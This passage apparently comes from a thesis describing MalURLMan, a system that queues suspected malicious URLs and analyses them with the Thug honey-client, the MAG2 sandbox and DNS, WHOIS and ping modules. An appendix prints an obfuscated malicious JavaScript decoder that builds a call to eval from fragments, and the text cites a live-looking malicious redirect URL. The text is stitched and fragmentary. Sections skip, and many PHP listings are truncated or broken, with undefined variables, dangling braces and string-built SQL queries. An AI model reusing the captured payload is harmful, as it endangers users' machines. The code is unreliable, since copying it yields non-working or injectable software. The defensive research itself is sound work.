code snippets Thug finds on the web site. No analysis is done to determine whether
a snippet is harmless or not; at least, no information about that can be found in
the logging format. However, Thug recently⁷ added support for pre- and post-
processing plugins, which gives us the ability to write plugins that could examine
these JavaScript snippets for anything suspicious, such as obfuscation techniques.
The other MongoDB collection, called samples, stores any executable encountered
when visiting a URL. It could store an executable if the visit is redirected to one, or
if a Java applet tries to run a JAR file, for instance.
As of now, we cannot really use data from Thug to reliably determine whether a
page is malicious; further work and improvements are needed in Thug. However, a
lot of the saved data can be used to rate a page as likely malicious. This is valuable
for creating queue priority mechanisms and filtering out benign URLs.
For the samples found, we are going to use Thug in cooperation with the MAG2
IVM environment, by uploading samples and executing them as tasks in the IVM
environment. We will describe that process in more detail in section 4.7.1.3.
4.5.1 REST API

For instance, we could have a partner system that submits URLs to our API, a
partner querying the API for information about a URL, or a partner leveraging the
API to run his own tests. Instead of giving partners direct access to the database,
we can control what they are allowed to do through our API. There are many
possibilities, and making sure our framework has support for further implementations
like this was a key factor.
The REST interface we implemented in MalURLMan is very basic, as we aimed
to implement the core features for our goals. The functionality in our REST API is
the ability to submit URLs, in addition to a simple mechanism for controlling access
to the API through an API key. To access this functionality, one can place an HTTP
query with the HTTP client curl.
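A call of the following form would do it (the endpoint path and parameter names
below are illustrative):

curl -d "apikey=SECRETKEY" \
     -d "url=http://example.com/suspicious/page.html" \
     http://malurlman.example/rest/url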
This will add the URL in question to the URL import queue by utilizing the ZF Url
Mapper mentioned in 4.3, and the call can be placed from any other system that has
access and wishes to add URLs to the system.
4.5.2 ZF Environment
4.6.2 Queue
After URLs are added to the system through an import script, they are stacked up
in the URL queue. From there, they are processed by the MalURLMan core module,
which inserts every URL into the URL analysis queue of each of the different analysis
modules. Each analysis module has its own queue, which provides flexibility in
processing, as it makes it possible to implement different queueing and processing
mechanisms for each queue, for instance different flavors of prioritization. In addition,
separate queues for different modules enable us to re-add a URL to a specific queue,
so that we do not have to re-evaluate the URL with modules we do not want to
re-evaluate with.
As mentioned in section 4.2, we do not have many IP addresses or proxy networks
available. Therefore, we decided not to implement mechanisms for URL priority in
the queue, as some of the methods mentioned in 3.5 may require several visits with
a LIHC. Another reason for not implementing queue priority mechanisms was the
time constraint this project is under. However, our queue design makes it possible
to add such mechanisms later.
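A minimal sketch of the core module's queue fan-out is shown below; the table and
column names are illustrative, not the actual MalURLMan schema:

<?php
// Sketch of the core module: move queued URLs into one analysis
// queue per active module. Table names are illustrative assumptions.
require_once 'bootstrap.php';

$db      = Zend_Db_Table::getDefaultAdapter();
$modules = array('thug', 'mag2', 'dns', 'whois', 'ping');

foreach ($db->fetchAll('SELECT id, url FROM url_queue') as $row) {
    foreach ($modules as $module) {
        $db->insert('analysis_queue_' . $module, array(
            'url_id'   => $row['id'],
            'added_at' => date('Y-m-d H:i:s'),
        ));
    }
    // Remove the URL from the import queue once it has been fanned out.
    $db->delete('url_queue', array('id = ?' => $row['id']));
}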
4.7 Honey-Client Analysis Modules

Each analysis module gathers information that can aid us in determining the status
of the URL. Implementing support for honey-client modules was the second devel-
opment priority after the URL import mechanisms, and we will start this section by
going through those modules.
4.7.1 Thug Analysis Module

Implementing support for Thug in our system is an easy task, because Thug is easy
to execute and has solid logging mechanisms. In our Thug modules we utilize the
MongoDB support that Thug has, and for every URL analyzed, we can query the
MongoDB collections for analysis data. Thug has three different collections: one for
storing all the URLs analyzed, one for storing all the events from the analysis in the
MAEC format, and one for storing executable samples.
4.7.1.1 Thug.php

In figure 4.3 we can see a diagram of the five-step process every URL in the Thug
analysis queue goes through. Each step is explained below:

1. Thug.php selects the next URL from the Thug analysis queue

2. Thug.php executes the Thug honey-client with the given URL

3. The Thug honey-client visits the given URL and analyzes the web site

4. The Thug honey-client stores all the analysis data in MongoDB collections

5. Thug.php stores the Thug honey-client task in the MalURLMan database,
and deletes the URL from the Thug analysis queue
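A sketch of how Thug.php could implement these steps is given below; the Thug
path, table names, and invocation are illustrative assumptions:

<?php
// Sketch of the Thug queue processor (steps 1-5 above).
require_once 'bootstrap.php';

$db  = Zend_Db_Table::getDefaultAdapter();
$row = $db->fetchRow('SELECT url_id, url FROM analysis_queue_thug LIMIT 1');

if ($row) {
    // Steps 2-4: run Thug against the URL; Thug itself writes its
    // MAEC events and samples into MongoDB.
    exec('python /opt/thug/src/thug.py ' . escapeshellarg($row['url']),
         $output, $exitCode);

    // Step 5: register the task and remove the URL from the queue.
    $db->insert('thug_tasks', array(
        'url_id' => $row['url_id'],
        'run_at' => date('Y-m-d H:i:s'),
    ));
    $db->delete('analysis_queue_thug', array('url_id = ?' => $row['url_id']));
}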
4.7.1.2 Thug_results.php

In addition to this process, we have another process, called Thug_results.php, that
queries the MongoDB database for Thug results. This process queries the events
collection and the samples collection for each URL. If it finds any samples, the
sample is stored in the filesystem and registered in the MalURLMan DB. Each step
in this process is explained below and can be seen in figure 4.4.

1. Thug_results.php selects all the URLs from thug_tasks that have been pro-
cessed by Thug

2. For each URL, look up its MongoID in the Thug urls collection

3. For each URL, find events and samples in the event and sample collections in
MongoDB based on the MongoID
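Below is a sketch of the MongoDB lookup, using the legacy PHP Mongo driver of
the time; the database name, collection fields, and sample encoding are assumptions
based on the description above, not verified against Thug:

<?php
// Sketch of querying Thug's MongoDB for samples belonging to one URL.
require_once 'bootstrap.php';

$mongo   = new Mongo();              // legacy PHP MongoDB driver
$samples = $mongo->selectDB('thug')->selectCollection('samples');

// $mongoId is assumed to have been stored when the Thug task was created.
foreach ($samples->find(array('url_id' => $mongoId)) as $sample) {
    // Write the sample to disk; it is then registered in the MalURLMan DB.
    file_put_contents('/var/samples/' . $sample['md5'],
                      base64_decode($sample['data']));
}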
4.7.1.3 Thug_mag2_sample.php

For each sample that is registered, we have another process that uploads it to MAG2
as a sample and creates a task to run it in the IVM. The process is pictured in
figure 4.5 and described by the following steps:

1. Thug_mag2_sample.php selects all newly registered Thug samples from the
MalURLMan DB

2. Each sample is uploaded to MAG2 through the MAG2 API

3. For each uploaded sample, a task to execute it in the IVM environment is
created

4. If the MAG2 IVM task was created successfully, both the sample id and task
id from MAG2 will be saved in MalURLMan, so it can query for results.
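A sketch of the upload step is shown below; the MAG2 API endpoint, parameters,
and response fields are hypothetical placeholders, since the real API is proprietary:

<?php
// Sketch of uploading a Thug sample to MAG2 and creating an IVM task.
// Endpoint, parameters, and response format are hypothetical.
require_once 'bootstrap.php';

$client = new Zend_Http_Client('https://mag2.example/api/samples');
$client->setParameterPost('apikey', 'SECRETKEY');
$client->setFileUpload('/var/samples/sample.exe', 'sample');
$response = $client->request('POST');

$result = Zend_Json::decode($response->getBody());
// Step 4: on success, store both IDs so the result modules can poll later.
if (isset($result['sample_id'], $result['task_id'])) {
    // ... save $result['sample_id'] and $result['task_id'] in the DB
}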
4.7.2 MAG2 Analysis Module

The MAG2 analysis module utilizes the MAG2 API from Norman to talk to the
MAG2 environment. This module is divided into different tasks. The first task is the
ability to upload executable Windows PE files and run them in the IVM virtual-
machine environment. The second task is the ability to use the same IVM virtual-
machine environment as a HIHC, by making it run Internet Explorer against the
URLs we specify. The third and fourth tasks are querying MAG2 for results. Due
to shortcomings in the MAG2 API, we are not able to get any information about
risk level or filter detection through the API, only through the MAG2 web interface.
Therefore, we had to split the MAG2 results module into two separate modules: one
for the API, and one for parsing the web interface.
The first task was explained in section 4.7.1.3 above, and the second task is ex-
plained in section 4.7.2.1 below.

4.7.2.1 Mag2.php

Mag2.php is used to process the URL analysis queue for the MAG2 module. The
process in Mag2.php is pictured in figure 4.6 and explained in the following steps:

1. Mag2.php selects the next URLs from the MAG2 analysis queue

2. Each URL is submitted as a URL sample through the MAG2 API

3. For each URL, a task to visit it in the IVM environment is created

4. For each sample and task created, save their MAG2 IDs in the MalURLMan
DB
4.7.2.2 Mag2_results.php

Mag2_results.php is used to query the MAG2 API for results from our current MAG2
tasks. This module asks for both URL tasks and executable tasks. The process is
pictured in figure 4.7 and described in the steps below:

1. Mag2_results.php gets all the MAG2 tasks that are not completed from the
MalURLMan DB

2. Query the MAG2 API with the task ID and check if the task status is set to
completed.

3. If the task is completed, get the task resources from the MAG2 API.

4. Save the task results in the MalURLMan DB.

5. If a resource has images, get and save the images to the filesystem from the
MAG2 API.

Figure 4.7: Process for querying the MAG2 API for results from our MAG2 tasks
4.7.2.3 mag2_page.php

This module is used to get the most important information from the analysis process,
namely information about risk and filter detections from the IVM.

1. Query the MalURLMan DB for all the current MAG2 tasks that are finished

2. Visit the MAG2 web interface task details page and search for "risk" and "filter
detection" in the source of the page

3. Save any risk value found in the MalURLMan DB
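A sketch of the scraping step is shown below; the task page URL and the exact
HTML around the risk value are placeholders, as the real MAG2 interface differs:

<?php
// Sketch of extracting the risk value from a MAG2 task details page.
// URL and HTML structure are hypothetical placeholders.
require_once 'bootstrap.php';

$taskId = 12345; // a finished MAG2 task taken from the MalURLMan DB
$html   = file_get_contents('https://mag2.example/task/' . $taskId);

// Step 2: search the page source for "risk" and pull out its value.
if (preg_match('/risk[^0-9]*([0-9]+)/i', $html, $match)) {
    $risk = (int) $match[1];
    // Step 3: save the risk value for this task in the MalURLMan DB.
}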
4.8 Open Source Intelligence Modules

DNS Module We have created a simple DNS module which utilizes the PEAR
Net_DNS2 and Net_URL2 packages in addition to the ZF bootstrap. The current
responsibility of this module is to map the relationship between IP, domain, and
URL and save it in the database for history purposes.
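A minimal sketch of the lookup step with PEAR Net_DNS2 is shown below; error
handling and the database write are trimmed:

<?php
// Sketch of resolving a domain with PEAR Net_DNS2.
require_once 'Net/DNS2.php';

$resolver = new Net_DNS2_Resolver(array('nameservers' => array('8.8.8.8')));
try {
    $response = $resolver->query('example.com', 'A');
    foreach ($response->answer as $rr) {
        // Each A record maps the domain to an IP; MalURLMan stores this
        // URL-domain-IP relationship with a timestamp for history.
        echo $rr->name . ' -> ' . $rr->address . "\n";
    }
} catch (Net_DNS2_Exception $e) {
    echo 'DNS lookup failed: ' . $e->getMessage() . "\n";
}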
WHOIS Module We have created a WHOIS module which utilizes the PEAR
Net_Whois and Net_URL2 packages in addition to the ZF bootstrap. The current
responsibility of this module is to store Whois data about every domain from every
URL we analyze.
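A minimal sketch of the lookup step with PEAR Net_Whois is shown below; the
raw text response is stored as-is, since formats differ between registries:

<?php
// Sketch of fetching WHOIS data with PEAR Net_Whois.
require_once 'Net/Whois.php';

$whois = new Net_Whois();
$data  = $whois->query('example.com'); // picks the right server for the TLD

if (PEAR::isError($data)) {
    echo 'WHOIS lookup failed: ' . $data->getMessage() . "\n";
} else {
    // Store the raw WHOIS text for the domain in the MalURLMan database.
    echo $data;
}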
4.9 URL Rating Scheme

Black - URL unreachable. This means that the host of the URL cannot be
reached.

Green - URL has been scanned, no malicious content was found, and no malicious
content has ever been associated with the hostnames belonging to the
domain.

Orange - No currently known threat, but the domain has been red in the past
(suspicious).

By default every URL is Gray, which means we cannot be certain whether the URL
is malicious or not. A URL can only be rated Red if we get a risk back from MAG2,
meaning that one of their filters has been triggered.
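The rating rules above could be expressed in code roughly as follows; the function
and field names are illustrative, not taken from MalURLMan:

<?php
// Sketch of the color rating rules described in this section.
// Array keys are illustrative assumptions.
function rateUrl(array $analysis)
{
    if (!$analysis['reachable']) {
        return 'black';               // host of the URL cannot be reached
    }
    if (!empty($analysis['mag2_risk'])) {
        return 'red';                 // a MAG2 detection filter triggered
    }
    if ($analysis['domain_was_red']) {
        return 'orange';              // no current threat, bad history
    }
    if ($analysis['scanned_clean'] && !$analysis['domain_history_bad']) {
        return 'green';               // scanned clean, clean domain history
    }
    return 'gray';                    // default: cannot be certain
}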
Chapter 5

System Evaluation

This chapter goes through the results of the system development and evaluates the
system and its capabilities.
5.1 MalURLMan Features

The current implementation of MalURLMan provides the following:

• Two access points for submitting URLs to the queue: either through the REST
API or the MalURLMan ZF environment.

• Example scripts that import URLs from specific sources. See B.3 and B.5 for
examples.
• A core module responsible for handling the URL queue by adding new URLs
to the analysis queues of all the currently active analysis modules. See B.6.

• A DNS analysis module responsible for extracting the domain name from a
URL, resolving the IP, and storing it in the database for history, showing the
relationship between domain names and IPs. See B.7.

• A Ping analysis module responsible for checking if hosts are alive. See B.8.
• A Whois analysis module responsible for querying the correct registrar for all
the available WHOIS information about a domain and storing it in the database.
See B.9.

• An analysis module responsible for processing the Thug URL queue, by sending
new URLs to Thug for analysis and adding a new "Thug task" to the database.
See B.10.

• An analysis module responsible for querying the Thug MongoDB for results for
any current "Thug tasks", saving any samples found to disk, and adding a new
"Thug sample" to the database. See B.11.

• An analysis module responsible for processing the MAG2 URL queue by sending
new URLs to the MAG2 API as URL samples and creating new MAG2 tasks in
the IVM with unlimited firewall restrictions. If the MAG2 task was successfully
created, the module will save it as a "MAG2 task" in the database, along with
the current status of the task. See B.12.

• An analysis module responsible for processing MAG2 task view web pages and
extracting the risk value. See B.15.
5.2 MalURLMan Usage Example 1

We are going to work with URLs gathered from a dataset from malware.com.br.
This site offers URL block lists in different formats, and we are going to work with
the XML version of their dataset. Their XML structure for the URL element includes
information about when the URL was listed as malicious and what kind of threat
was found. The dataset contains 6503 URLs, added over a large time span from 2005
until 2012. In table 5.1, we can see the distribution of URLs per year. Noting that
over half the URLs were rated as malicious before 2012, we can probably expect that
a lot of the URLs are no longer malicious (false-positives). To avoid this, we only
import URLs from 2012, and in addition we import the URLs in such a way that we
know which month each URL is from, by creating a new URL source for each month
in the database.
To extract the URLs from the dataset and import them into the database, we wrote
a simple PHP script with help from the MalURLMan ZF bootstrap. The script can
be found in B.4. As we can see there, it extracts each URL from the dataset and uses
the Model Url Mapper, as introduced in section 4.3, to save the URL with the source
parameter set.
Unfortunately, the dataset from Table 5.2 contains many duplicate URLs; therefore,
we only add unique URLs to the URL analysis queue. As a result, the number of
URLs per month is reduced, as shown in Table 5.3.
5.2.3 Test Discussion

One task was not flagged by any detection filters even though it actually changed the
contents of the hosts file¹. In addition, another task created a file called svhost.exe
inside the Windows directory, which was also not detected by any filters. This shows
us that we should reconsider our filter rules for detection, in order to detect more
malicious activity.
This test also showed that MalURLMan can import URLs, send them to analysis
modules for analysis, and retrieve results from the analysis modules. It also shows
that we can save processing time in MAG2 by filtering out dead URLs with the DNS
module before we send them to MAG2. Given one MAG2 IVM available to process
URLs, we saved 343 minutes of processing time by simply checking that URLs are
alive before processing them any further.
Thug's results are in many ways inconclusive, since they do not directly say anything
about the maliciousness of a URL. In this case, Thug only saves JavaScript and
executable samples, like Windows PE executables, Java JAR files, and Flash SWF
files, which we can use for further analysis with other tools. By manual inspection
we can, for instance, see cases of JavaScript that look suspicious in comparison to
JavaScript snippets from known libraries like jQuery. However, Thug does not yet
have any plugins to determine the suspiciousness of a JavaScript snippet. In cases
where Thug finds executables, it will save the samples, and the MAG2 Thug process
(see 4.7.1.3) will upload them to MAG2. However, it will only upload PE files, since
this version of MAG2 does not support any other file types.
MAG2's results are more conclusive, as it gives tasks a risk rating if any detection
filters are triggered. In our case, detection filters trigger if, for instance, a visit to
a URL results in the creation of processes in suspicious places or the adding of
autostart objects. However, for our uploaded PE files, the same filters will trigger if
a file, for instance, creates a temporary file in a temp folder. This is not suspicious
for a typical installer program, which is what many of the uploaded files were.
This test also shows an interesting trait of the hybrid honey-client system con-
figuration. None of the malicious URLs where Thug found executables were rated
malicious by MAG2, and Thug could not evaluate the executables itself. However,
by uploading the samples Thug found to the MAG2 IVM, the system could still
evaluate them.
¹ The hosts file is used by operating systems to map hostnames to IPs.
5.3 MalURLMan Usage Example 2

5.3.1 Thug Analysis

On the first visit to one of the URLs in this test, Thug recorded the following
JavaScript redirect, which was no longer present on a second visit from the same IP:

window.location="http://contentdesigner.ru/hwohuwr/pntkmra.php";
This is a difference that should raise some suspicion, in addition to the URL path
looking unnatural. If the redirection URL had pointed to a suspicious TLD, that
could have raised even more suspicion; for instance, if we were redirected from a
Russian site to a Chinese site. That is not the case here. But since the redirect code
was removed on our second request from the same IP, we decided to analyze the URL
further with our HIHC module.
5.3.3 Test Discussion

This test shows that MalURLMan, in its current state, can detect malicious pages
that target our honey-client configurations. In fact, we queried Google Safe Browsing
for their rating of the URL; at first, it had no rating for the URL. Therefore, we
submitted the URL to their analysis service, to see if they would detect any malicious
activity. When Google had visited and analyzed the URL, their diagnostic page said
it had visited the URL but found no malicious activity. See figure A.4 for more
details. This may indicate that the TDS is either blocking Google's IPs, or that it is
not exploiting their honey-client configurations. Either way, it shows the importance
of using unknown IPs when visiting URLs.
Chapter 6

Conclusion

The goal of this thesis was to create a system able to crawl potentially malicious
URLs and rate them as malicious or not. To that end, we created a modular system
for managing malicious URLs, with the capability to import URLs from specific
sources and analyze them with the help of a hybrid honey-client configuration and
other analysis modules. This lays the groundwork for a system that can help in the
ever-evolving fight against malicious web sites. The system serves as a proof of
concept, utilizing a hybrid honey-client configuration to better detect malicious
activity. Our tests also showed the importance of managing honey-client configu-
rations with respect to IP addresses. By re-evaluating a malicious web site from the
same honey-client configuration with the same IP address, we observed that the
honey-client got served a benign web site instead of a malicious one, which introduced
a false-negative in our ratings and illustrates the importance of using proxies.
¹ Volunteer computing is a form of distributed computing in which the general public
volunteers processing and storage capacity to scientific research projects[23].
Bibliography
[1] Statcounter global stats: Top 5 browsers from w20 2011 to w20 2012. [Online].
Available: http://gs.statcounter.com/#browser-ww-weekly-201120-201220
[4] Blue Coat White Paper - 2011 Mid-Year Security Report. Blue Coat, 2011.
[5] N. Provos, P. Mavrommatis, M. Rajab, and F. Monrose, “All your iframes point
to us,” in Proceedings of the 17th conference on Security symposium. USENIX
Association, 2008, pp. 1–15.
[7] Symantec. (2008, May) Symantec report: Attacks increasingly target trusted
web sites. [Online]. Available: http://www.symantec.com/resources/articles/
article.jsp?aid=20080513_sym_report_attacks_increasingly
[8] (2010, 05) Websense 2010 threat report: Key statistical findings:
Web security. [Online]. Available: http://www.websense.com/content/
threat-report-2010-web-security.aspx
[10] Symantec Global Internet Security Threat Report Trends for 2008. Symantec,
2009, vol. XIV.
[11] Symantec. (2011, January) Report on attack toolkits and malicious websites.
[Online]. Available: http://www.symantec.com/about/news/resources/press_
kits/detail.jsp?pkid=attackkits
[19] D. Canali, M. Cova, G. Vigna, and C. Kruegel, “Prophiler: A fast filter for
the large-scale detection of malicious web pages,” in Proceedings of the 20th
international conference on World wide web. ACM, 2011, pp. 197–206.
Appendix A

Screenshots
Figure A.1: Here we see the vendor of the Black Hole exploit kit advertising its
features on the Russian board vendors.pro. This screenshot was taken on 12.4.2012,
and it was automatically translated from Russian to English using Google Chrome.
It is not the latest version of Blackhole, but it showcases how advanced it was at that
time.
A.2.1 Statistics

In figure A.2 we can see an overview of different statistics in a live Black Hole
instance. It can tell us how much traffic has hit the instance, how many successful
loads of the malware there have been, which exploits have been successful, and what
kinds of clients have been exploited.
Figure A.2: The statistics view in the Black Hole Exploit Kit, source:
http://www.xylibox.com/search/label/blackhole
Source Code
B.1 Thug MAEC Log Example
13.5, 9.5, 14, 17, 16.5, 8, 19.5, 1, 7.5, 10.5, 2, 7.5, 13.5, 9.5, 21,
// ... (the obfuscated numeric payload array continues for several
// pages; only its first and last values are reproduced here) ...
36.5, 21.5];
v=" e "+" va " ; }
i f ( v ) e=window [ v+" l " ] ; t r y {q=document [ " c r e a "+" t e E l e "+"
ment" ] ( "b" ) ;
i f ( e ) q . appendChild ( q+"" ) ; } c a t c h ( fwbewe ) {w=f ; s = [ ] ; }
r=S t r i n g ; z =(( e ) ? h : "" ) ;
f o r ( ; 5 7 5 ! = i ; i +=1){ j=i ; i f ( e ) s=s+r [ " f r "+"omC" +(( e ) ?
z : 1 2 ) ] ( ( w[ j ]⇤1+41) ⇤2) ; }
i f ( v&& ; e&& ; r&& ; z&& ; h&
;& ; s&& ; f
&& ; v&& ; v&& ; e&& ; r&&
amp ; h )
t r y { dsgsdg=p r o t o t y p e ; } c a t c h ( dsdh ) { e ( ( ( e ) ? s : 1 2 ) ) ; }
</Code_Segment>
</ Code_Snippet>
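The decoder above resolves window["eval"] from string fragments, maps every numeric value w[j] to a character code with (w[j]*1+41)*2, and feeds the resulting string to eval via String.fromCharCode. A minimal PHP sketch of the same transform, usable for deobfuscating such payloads offline; the short $w array is merely a stand-in for the full numeric payload:

<?php
// Offline deobfuscation sketch: applies the decoder's transform,
// (w[j]*1 + 41) * 2, and maps each result through chr(), PHP's
// counterpart to String.fromCharCode.
$w = array(13.5, 9.5, 14, 17, 16.5, 8, 19.5, 1, 7.5, 10.5);

$s = '';
foreach ($w as $value) {
    $s .= chr((int) (($value * 1 + 41) * 2));
}
echo $s . "\n"; // prints the decoded fragment of the script
?>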
B.2 Zend Framework Bootstrap Script
<?php
define('APPLICATION_ENV', 'development');

/** Zend_Application */
require_once 'Zend/Application.php';
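The listing is cut off at this point in the original. The remaining bootstrap lines can be inferred from listing B.10 (Thug.php), where they reappear verbatim; APPLICATION_PATH is assumed to be defined alongside APPLICATION_ENV:

// Create application, bootstrap, and fetch the 'db' resource
// (these lines reappear at the top of listing B.10).
$application = new Zend_Application(APPLICATION_ENV,
    APPLICATION_PATH . '/configs/application.ini');
$application->bootstrap(array('db'));
$db = $application->getBootstrap()->getResource('db');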
<?php
/**
 * Zend Framework Bootstrap code from listing B.2 here
 */

$malwareURLs = simplexml_load_file("brmalware.xml");
foreach ($malwareURLs as $malware) {
    $options = array('url'    => (string) $malware->uri,
                     'source' => 'malware.com.br');
    $url = new Application_Model_Url($options);
    $urlMapper = new Application_Model_UrlMapper(); // save the URL,
    $urlMapper->save($url);                         // as in listing B.4
}
B.4 Malware.com.br Test Import Script
<?php
/**
 * Zend Framework Bootstrap code from listing B.2 here
 */
$yay = array();
$yey = array();
$urls = array();
$count = array();
foreach ($malwareURLs as $malware) {
    $year  = substr((string) $malware->date, 0, 4);
    $month = substr((string) $malware->date, 4, 2);
    $day   = substr((string) $malware->date, 6, 2);
    $yey[$year]++;
    if ($year == '2012') {
        // echo (string) $malware->date . " aka $year $month $day\n";
        $yay[$month]++;
        switch ($month) {
            case '01':
                $src = 'malware.com.br.jan';
                break;
            case '02':
                $src = 'malware.com.br.feb';
                break;
            case '03':
                $src = 'malware.com.br.mar';
                break;
            case '04':
                $src = 'malware.com.br.apr';
                break;
            case '05':
                $src = 'malware.com.br.may';
                break;
            case '06':
                $src = 'malware.com.br.jun';
                break;
        }
        $url = new Application_Model_Url($options);
        $urlMapper = new Application_Model_UrlMapper();
        $urlMapper->save($url);
    } else {
        $count[md5((string) $malware->uri)]['url'] = (string) $malware->uri;
        $count[md5((string) $malware->uri)]['count']++;
    }
}
$saved = 0;
foreach ($count as $cunt) {
    $saved += $cunt['count'];
}
?>
B.5 MalwareDomainList Import Script
<?php
/**
 * Zend Framework Bootstrap code from listing B.2 here
 */
$row = 1;
$urls = array();
if (($handle = fopen("updates.csv", "r")) !== FALSE) {
    while (($data = fgetcsv($handle, 1000, ",")) !== FALSE) {
        $urls[] = $data;
        $row++;
    }
    fclose($handle);
}
$malwareURLs = array();
foreach ($urls as $url) {
    if ($url[1] != '') {
        $malwareURLs[] = $url[1];
    } elseif ($url[2] != '') {
        $malwareURLs[] = $url[2];
    }
}
B.6 Core.php
<?php
/**
 * Zend Framework Bootstrap code from listing B.2 here
 */
$last_checked = time();
$time_added = time();
}
?>
B.7 DNS.php
<?php
/**
 * Zend Framework Bootstrap code from listing B.2 here
 */
require_once 'Net/DNS2.php';
require_once 'Net/URL2.php';
$module_id = 6;
$urls = $db->fetchall("SELECT * FROM url_analysis_queue WHERE module_id = '6' LIMIT 1000");
foreach ($urls as $url) {
    switch ($url['url_src']) { // switch header elided in the original
                               // print; assumed to match listing B.8
        default:
            $u = $url['url'];
    }
    $url2 = new Net_URL2($u);
    $host = $url2->host;
    $r = new Net_DNS2_Resolver();
    try {
        $result = $r->query($url2->host);
        $ipaddr = $result->answer['0']->address;
    } catch (Net_DNS2_Exception $e) {
    }
    $up = 1;
    if (!isset($ipaddr)) {
        $ipaddr = 1;
        $up = 0;
    }
    // (the domain lookup preceding this else branch is elided in the
    //  original print)
    } else {
        $domain_id = $domain[0]['id'];
    }
    $ip_long = ip2long($ipaddr);
    if (empty($ip2)) {
        $db->insert('ip', array('ip' => $ip_long));
        $ip_id = $db->lastInsertId();
    } else {
        $ip_id = $ip2[0]['id'];
    }
    $db->delete('url_analysis_queue',
        array('url_id = ?'    => $url['url_id'],
              'module_id = ?' => $module_id)
    );
}
?>
B.8 Ping.php
<?php
/**
 * Zend Framework Bootstrap code from listing B.2 here
 */
require_once 'Net/URL2.php';
require_once 'Net/Ping.php';
require_once 'Net/DNS2.php';
require_once 'Net/CheckIP2.php';
$module_id = 8;
foreach ($urls as $url) {
    switch ($url['url_src']) {
        case '1':
            $u = 'http://' . $url['url'];
            break; // break added; the original print falls through
        case '3':
            $u = 'http://' . $url['url'];
            break; // break added; the original print falls through
        default:
            $u = $url['url'];
    }
    $url2 = new Net_URL2($u);
    $host = $url2->host;
    $ip = 0;
    if (Net_CheckIP2::isValid($host)) {
        $data['ip'] = $host;
        $data['fqdn'] = '';
        $data['destfqdn'] = '';
    } else {
        $r = new Net_DNS2_Resolver();
        try {
            $result = $r->query($url2->host);
            // in some cases domains may point to a cname which points to a
            // new cname which points to a new cname etc...
            // cname -> cname -> cname -> ... -> cname -> a -> ip
            // not usual, but may happen. We choose to only store the first
            // cname and the last a -> ip
            // Net_DNS2_Resolver gives us a result array consisting of
            // what we need:
            $i = 0;
            foreach ($result->answer as $rr) {
                if ($i == 0 && $rr->type == "CNAME") { // the fqdn from the url
                    $data['fqdn'] = $rr->name;
                }
                if ($rr->type == "A") {
                    $data['ip'] = $rr->address;
                }
            }
            if ($data['ip'] != 0) {
                $ping = Net_Ping::factory();
                if (PEAR::isError($ping)) {
                    echo $ping->getMessage();
                } else {
                    $matches = array();
                    $severely = true;
                    $ping->setArgs(array(
                        "count" => 1,
                        "size"  => 32,
                    // (the rest of the argument list, the ping call that
                    //  assigns $res, and the try's catch block are elided
                    //  in the original print)
                    $data['up'] = true;
                    if (PEAR::isError($res)) {
                        $data['up'] = false;
                    }
                    if ($res->_received == 0) {
                        $data['up'] = false;
                    }
                }
            }
        } else {
            $data['up'] = false;
        }
    $data['ip'] = ip2long($data['ip']);
    $db->insert('ip_domain', $data);
    $db->delete('url_analysis_queue',
        array('url_id = ?'    => $data['url_id'],
              'module_id = ?' => $module_id)
    );
}
?>
B.9 Whois.php
<?php
/**
 * Zend Framework Bootstrap code from listing B.2 here
 */
/*
// import whois server list from http://serverlist.domaininformation.de/
$servers = simplexml_load_file("index.html");
foreach ($servers->server as $server) {
    // print_r($server);
    // only insert those we know are connected to a specific TLD.
    if (isset($server->domain)) {
        $domain = $server->domain->attributes()->name[0];
        $whois = $server->attributes()->host[0];
        $whois = (string) $whois;
        $domain = (string) $domain;
        echo "whois server for TLD: " . $domain . " is " . $whois . "\n";
        $data = array('whois' => $whois, 'tld' => $domain);
        $db->insert('whois', $data);
    }
}
*/
$url2 = new Net_URL2($u);
$host = $url2->host;
$tld = explode(".", $host);
$tld = end($tld); // take the last label; the original print used $tld[1],
                  // which breaks for hosts with more than two labels
$whois = $db->fetchall("SELECT * FROM whois WHERE tld='" . $tld . "'");
print_r($whois);
$server = $whois[0]['whois'];
$query = $host; // get information about this domain
$whois = new Net_Whois();
$whoisdata = $whois->query($query, $server);
$data = array(
    'url_id' => $url['url_id'],
    'whois'  => $whoisdata
);
B.10 Thug.php
<?php
/**
 * Zend Framework Bootstrap code from listing B.2 here
 */
$module_id = 2;
// Create application, bootstrap, and run
$application = new Zend_Application(APPLICATION_ENV,
    APPLICATION_PATH . '/configs/application.ini');
$application->bootstrap(array('db'));
$db = $application->getBootstrap()->getResource('db');
foreach ($urls as $url) {
// (the loop body is elided in the original print)
?>
B.11 Thug_results.php
<?php
/**
 * Zend Framework Bootstrap code from listing B.2 here
 */
require_once 'HTTP/Request2.php';
$module_id = 4;
$data = array();
try {
    $mongo = new Mongo('localhost');
    $mongoDB = $mongo->thug;
    $collection = $mongoDB->urls;
    $tasks = $db->fetchall("SELECT * FROM thug_tasks where url_id > 14458");
    $thugs = array();
    foreach ($tasks as $task) {
        $cursor = $collection->find(array('url' => $task['url']));
        while ($cursor->hasNext()) {
            $thugs[] = $cursor->getNext();
        }
    }
    $events = $mongoDB->events;
    $samples = $mongoDB->samples;
    $samples_data = array();
    $events_data = array();
    // ($samples_cursor is built from $samples in lines elided from the print)
    foreach ($samples_cursor as $sample) {
        // $sample['data'] = false;
        $sample['malurlmanurl'] = $thug['url'];
        $samples_data[] = $sample;
    }
    // do something with events data
    // print_r($events_data);
    // do something with samples
    // print_r($samples_data);
    $dir = md5($sample['url']);
    $dir = md5($sample['malurlmanurl']);
    $path = 'thug_samples/' . $dir;
    var_dump($path);
    mkdir($path, 0777, true);
    switch ($sample['type']) {
        case 'PE':
            $fileext = "exe";
            break;
        case 'JAR':
            $fileext = "jar";
            break;
    }
    $filename = $sample['md5'] . "." . $fileext; // the md5() of the file
    $filepath = $path . "/" . $filename;
    $mongo->close();
} catch (MongoConnectionException $e) {
    die('Error connecting to MongoDB server');
} catch (MongoException $e) {
    die('Error: ' . $e->getMessage());
}
?>
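The listing computes $filename and $filepath for each sample, but the write call itself is cut off in the print. Presumably the sample body is persisted roughly as follows; this is a sketch only, with file_put_contents standing in for whatever the original used:

<?php
// Sketch: persist the sample body to the path computed above.
// file_put_contents is an assumption; the original call is not in the print.
file_put_contents($filepath, $sample['data']);
?>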
B.12 MAG2.php
<?php
/**
 * Zend Framework Bootstrap code from listing B.2 here
 */
require_once 'HTTP/Request2.php';
$module_id = 4;
foreach ($urls as $url) {
    $mag2 = false;
    $request = new HTTP_Request2('https://mag2.norman.com/rapi/samples?owner=vaagland');
    $request->setMethod(HTTP_Request2::METHOD_POST)
